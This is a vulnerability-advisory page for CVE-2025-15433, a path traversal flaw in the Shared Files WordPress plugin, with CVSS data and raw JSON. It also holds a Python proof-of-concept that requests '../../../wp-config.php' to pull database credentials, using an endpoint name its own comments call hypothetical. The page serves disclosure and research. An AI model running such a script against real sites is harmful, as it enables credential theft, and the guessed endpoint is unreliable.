Security Vulnerability Report
中文
CVE-2025-15433 CVSS 6.8 MEDIUM

CVE-2025-15433

Published: 2026-03-26 07:16:19
Last Modified: 2026-04-15 15:05:48

Description

The Shared Files WordPress plugin before 1.7.58 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Shared Files < 1.7.58

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-15433 PoC: Shared Files < 1.7.58 Arbitrary File Download # Requires Contributor privileges or higher. target_url = "http://example.com" login_cookie = "wordpress_logged_in_xxx=..." # Cookie from logged in Contributor user # The vulnerable endpoint usually involves a direct or AJAX request to download a file. # The payload uses directory traversal to escape the web root. file_to_download = "../../../wp-config.php" headers = { "Cookie": login_cookie, "User-Agent": "Mozilla/5.0 (PoC Scanner)" } # Example endpoint structure (adjust based on actual plugin routing) # Often plugins use /?download=... or specific admin-ajax.php actions url = f"{target_url}/wp-admin/admin-ajax.php" payload = { "action": "shared_files_download_file", # Hypothetical action name "file": file_to_download } response = requests.get(url, headers=headers, params=payload) if "define('DB_NAME'" in response.text: print("[+] Vulnerability Exploited Successfully!") print("[+] File Content:") print(response.text) else: print("[-] Failed to exploit or target not vulnerable.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15433", "sourceIdentifier": "[email protected]", "published": "2026-03-26T07:16:19.133", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shared Files WordPress plugin before 1.7.58 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector"}, {"lang": "es", "value": "El plugin de WordPress Shared Files anterior a 1.7.58 permite a usuarios con un rol tan bajo como Colaborador descargar cualquier archivo en el servidor web (como wp-config.php) mediante un vector de salto de ruta."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "references": [{"url": "https://wpscan.com/vulnerability/893667a1-dc8f-476a-ac00-55752fface90/", "source": "[email protected]"}]}}